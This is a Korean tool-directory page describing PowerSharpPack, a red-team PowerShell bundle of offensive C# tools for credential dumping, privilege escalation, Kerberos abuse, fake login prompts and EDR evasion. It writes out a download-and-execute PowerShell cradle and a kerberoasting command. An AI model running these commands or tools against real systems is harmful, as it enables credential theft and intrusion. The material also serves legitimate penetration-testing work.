Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PowerSharpPack — PowerShell 래퍼로, 50개 이상의 C# 공격 보안 도구를 번들링하여 침투 후 작업, 권한 상승, 자격 증명 덤핑, 측면 이동 및 Active Directory 정찰을 위한 레드 팀 활동에 사용됩니다. | Kitploit
도구/GitHubGitHub/s3cur3th1ssh1t/powersharppack
Privilege EscalationExploit FrameworksPayload GenerationLateral MovementInformation GatheringPost-ExploitationPenetration TestingRed Teaming
GitHubs3cur3th1ssh1t/powersharppack

PowerSharpPack

PowerShell 래퍼로, 50개 이상의 C# 공격 보안 도구를 번들링하여 침투 후 작업, 권한 상승, 자격 증명 덤핑, 측면 이동 및 Active Directory 정찰을 위한 레드 팀 활동에 사용됩니다.

저장소 보기
1.7k312241년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

후원

     

PowerSharpPack

유용한 공격적 CSharp 프로젝트 여러 개를 Powershell로 감싸서 쉽게 사용할 수 있도록 했습니다.

왜? 제 개인적인 의견으로는 AMSI, 스크립트 블록 로깅, 제한된 언어 모드 또는 기타 보호 기능 때문에 공격적인 Powershell이 죽은 것은 아닙니다. 이러한 메커니즘은 모두 우회될 수 있습니다. 대부분의 새로운 혁신적인 공격 보안 프로젝트가 C#으로 작성되기 때문에, 저는 이를 powershell에서도 사용할 수 있도록 만들기로 결정했습니다.

그래서 기본적으로 무엇을 했을까요?

  1. 먼저 각 C# Repo를 클론합니다.
  2. 클래스와 main 메서드를 public으로 설정합니다.
  3. 일부 프로젝트의 경우 새로운 기능이나 버그 수정이 포함된 pull request를 병합하거나, 전체 powershell 프로세스가 매개변수 누락 등으로 종료되지 않도록 environment.exit 문을 제거해야 했습니다.
  4. 그런 다음 각 바이너리를 컴파일합니다.
  5. 컴파일된 바이너리 base64를 Gzip 압축 및 base64 인코딩한 후 [System.Reflection.Assembly]::Load($DecompressedDecodedBinary)를 통해 powershell에 로드합니다.

매우 간단하지만 많은 저장소의 경우 시간이 많이 소요되는 프로세스입니다.

어떤 도구가 포함되어 있나요?

Internalmonologue

내부 모놀로그 공격: LSASS를 건드리지 않고 NTLM 해시 획득

@크레딧: https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbelt는 보안 중심 호스트 조사 "안전 점검"을 수행하는 C# 프로젝트로, 공격 및 방어 보안 관점 모두에서 관련이 있습니다.

@크레딧: https://github.com/GhostPack/Seatbelt

SharpWeb

Google Chrome, Mozilla Firefox 및 Microsoft Internet Explorer/Edge에서 저장된 브라우저 자격 증명을 검색하는 .NET 2.0 CLR 프로젝트입니다.

@크레딧: https://github.com/djhohnstein/SharpWeb

UrbanBishop

UrbanBishop에서 로컬 RW 섹션을 만든 다음 해당 섹션을 원격 프로세스에 RX로 매핑합니다. 쉘코드 로딩이 쉬워집니다.

@크레딧: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUp은 다양한 PowerUp 기능을 C#으로 포팅한 것입니다.

@크레딧: https://github.com/GhostPack/SharpUp

Rubeus

Rubeus는 원시 Kerberos 상호 작용 및 남용을 위한 C# 도구 세트입니다.

@크레딧: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

C#으로 작성된 Windows 지속성 툴킷입니다.

@크레딧: https://github.com/fireeye/SharPersist

Sharpview

harmj0y의 PowerView를 C#으로 구현한 것입니다.

@크레딧: https://github.com/tevora-threat/SharpView

winPEAS

book.hacktricks.xyz의 로컬 Windows 권한 상승 체크리스트를 확인합니다.

@크레딧: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Lockless는 잠긴 파일의 복사를 허용합니다.

@크레딧: https://github.com/GhostPack/Lockless

SharpChromium

Chromium 데이터(쿠키, 기록, 저장된 로그인)를 검색하는 .NET 4.0 CLR 프로젝트입니다.

@크레딧: https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPI는 일부 Mimikatz DPAPI 기능을 C#으로 포팅한 것입니다.

@크레딧: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

현재 도메인의 모든 네트워크 공유를 열거합니다. 또한 이름을 IP 주소로 확인할 수 있습니다.

@크레딧: https://github.com/djhohnstein/SharpShares

SharpSniper

사용자 이름과 로그온 IP 주소를 통해 Active Directory에서 특정 사용자를 찾습니다.

@크레딧: https://github.com/HunnicCyber/SharpSniper

SharpSpray

LDAP를 사용하여 도메인의 모든 사용자에 대해 암호 스프레이 공격을 수행하는 간단한 코드 세트이며 Cobalt Strike와 호환됩니다.

@크레딧: https://github.com/jnqpblc/SharpSpray

Watson

누락된 KB를 열거하고 유용한 권한 상승 취약점에 대한 익스플로잇을 제안합니다.

@크레딧: https://github.com/rasta-mouse/Watson

Grouper2

AD 그룹 정책에서 취약점을 찾습니다.

@크레딧: https://github.com/l0ss/Grouper2

Tokenvator

Windows 토큰으로 권한을 상승시키는 도구입니다.

@크레딧: https://github.com/0xbadjuju/Tokenvator

SauronEye

특정 단어가 포함된 특정 파일(예: 비밀번호가 포함된 파일)을 찾는 검색 도구입니다.

@크레딧: https://github.com/vivami/SauronEye

메인 스크립트를 로드하려면

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

를 사용하고, 예를 들어 다음과 같이 도구를 스위치 매개변수로 선택합니다:

PowerSharpPack -seatbelt -Command "AMSIProviders"

alt text

바이너리에 여러 매개변수를 전달하려면 따옴표를 사용하면 됩니다:

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

어떤 이유로 모든 바이너리를 로드하고 싶지 않다면 PowerSharpBinaries 폴더에 있는 개별 바이너리용 Powershell 스크립트를 사용할 수 있습니다.

독립형 powershell 스크립트로도 사용 가능한 프로젝트:

SharpCloud

AWS, Microsoft Azure 및 Google Compute와 관련된 자격 증명 파일의 존재 여부를 확인하는 간단한 C# 도구입니다.

@크레딧: https://github.com/chrismaddalena/SharpCloud

SharpSSDP

SSDP 서비스 검색

@크레딧: https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT: 데이터베이스 감사 프레임워크 및 툴킷

@크레딧: https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

Active Directory 환경에서 리소스 기반 제한 위임 공격 경로를 발견하는 도구입니다.

@크레딧: https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

그룹 정책을 통해 원격 액세스 정책을 열거하는 C# 도구입니다.

@크레딧: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

리소스 기반 제한 위임(msDS-AllowedToActOnBehalfOfOtherIdentity)을 통한 컴퓨터 개체 인수

@크레딧: https://github.com/pkb1s/SharpAllowedToAct

WireTap

비디오, 오디오 및 키보드 하드웨어와 상호 작용하는 .NET 4.0 프로젝트입니다.

@크레딧: https://github.com/djhohnstein/WireTap

SharpClipboard

C# 클립보드 모니터

@크레딧: https://github.com/slyd0g/SharpClipboard

SharpPrinter

프린터 검색 + 취약점 확인

@크레딧: https://github.com/rvrsh3ll/SharpPrinter

SharpHide

숨겨진 레지스트리 키를 생성하는 도구입니다.

@크레딧: https://github.com/outflanknl/SharpHide

SpoolSample

MS-RPRN RPC 인터페이스를 통해 Windows 호스트가 다른 시스템에 인증하도록 강제하는 PoC 도구입니다. 다른 프로토콜을 통해서도 가능합니다.

@크레딧: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuse는 C#으로 작성된 .NET 애플리케이션으로, 그룹 정책 개체(GPO)에 대한 사용자의 편집 권한을 악용하여 해당 GPO가 제어하는 개체를 손상시키는 데 사용할 수 있습니다.

@크레딧: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDump는 PowerSploit의 Out-Minidump.ps1 기능을 C#으로 포팅한 것입니다.

@크레딧: https://github.com/GhostPack/SharpDump

SharpHound3

BloodHound 프로젝트용 C# 데이터 수집기, 버전 3

@크레딧: https://github.com/BloodHoundAD/SharpHound3

PostDump

탐지를 피하기 위해 몇 가지 기술을 사용하여 LSASS 프로세스의 미니덤프를 수행하는 또 다른 도구입니다.

@크레딧: https://github.com/YOLOP0wn/POSTDump

SharpLocker

SharpLocker는 가짜 Windows 잠금 화면을 띄워 현재 사용자 자격 증명을 얻는 데 도움을 줍니다. 모든 출력은 콘솔로 전송되며 Cobalt Strike에 완벽하게 작동합니다.

@크레딧: https://github.com/Pickfordmatt/SharpLocker

Eyewitness

EyeWitness는 웹사이트의 스크린샷을 찍고, 서버 헤더 정보를 제공하며, 가능한 경우 기본 자격 증명을 식별하도록 설계되었습니다.

@크레딧: https://github.com/FortyNorthSecurity/EyeWitness

FakeLogonScreen

비밀번호를 훔치기 위한 가짜 Windows 로그온 화면

@크레딧: https://github.com/bitsadmin/fakelogonscreen

P0wnedShell

PowerShell Runspace 사후 침투 툴킷

@크레딧: https://github.com/Cn33liz/p0wnedShell

Safetykatz

SafetyKatz는 @gentilkiwi의 Mimikatz 프로젝트와 @subTee의 .NET PE 로더를 약간 수정하여 결합한 것입니다. 저는 이를 다시 자체 난독화된 Mimikatz 버전으로 수정했습니다.

@크레딧: https://github.com/GhostPack/SafetyKatz

InveighZero

Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 스푸퍼/중간자 도구입니다.

@크레딧: https://github.com/Kevin-Robertson/InveighZero

SharpSploit

SharpSploit는 C#으로 작성된 .NET 사후 침투 라이브러리입니다.

@크레딧: https://github.com/cobbr/SharpSploit

Snaffler

침투 테스터가 맛있는 사탕을 찾는 데 도움을 주는 도구, @l0oss 및 @Sh3r4 제작 (트위터: @/mikeloss 및 @/sh3r4_hax).

@크레딧: https://github.com/SnaffCon/Snaffler

BadPotato

itm4ns Printspoofer의 C# 버전입니다.

@크레딧: https://github.com/BeichenDream/BadPotato

BetterSafetyKatz

SafetyKatz의 포크로, gentilkiwi GitHub 저장소에서 직접 최신 사전 컴파일된 Mimikatz 릴리스를 동적으로 가져오고, 런타임에 서명을 패치하며, SharpSploit DInvoke를 사용하여 PE를 메모리에 로드합니다.

@크레딧: https://github.com/Flangvik/BetterSafetyKatz

SharpKatz

mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys 및 lsadump::dcsync 명령의 C# 포트입니다.

@크레딧: https://github.com/b4rtik/SharpKatz

Gopher

쉬운 표적을 발견하는 C# 도구입니다.

@크레딧: https://github.com/EncodeGroup/Gopher

SharpOxidResolver

AirBus Security/PingCastle의 IOXIDResolver입니다.

@크레딧: https://github.com/vletoux/pingcastle/

SharpBlock

진입점 실행을 차단하여 EDR의 활성 프로젝션 DLL을 우회하는 방법입니다.

@크레딧: https://github.com/CCob/SharpBlock

SharpLoginPrompt

이 프로그램은 현재 사용자의 사용자 이름과 비밀번호를 수집하기 위한 로그인 프롬프트를 생성합니다. 이 프로젝트는 레드 팀이 lsass를 건드리거나 시스템에 대한 관리자 자격 증명 없이도 현재 사용자의 사용자 이름과 비밀번호를 피싱할 수 있도록 합니다.

@크레딧: https://github.com/shantanu561993/SharpLoginPrompt

ThunderFox

Thunderbird 및 Firefox에서 데이터(연락처, 이메일, 기록, 쿠키 및 자격 증명)를 검색합니다.

@크레딧: https://github.com/V1V1/SharpScribbles

StickyNotesExtract

도구 다운로드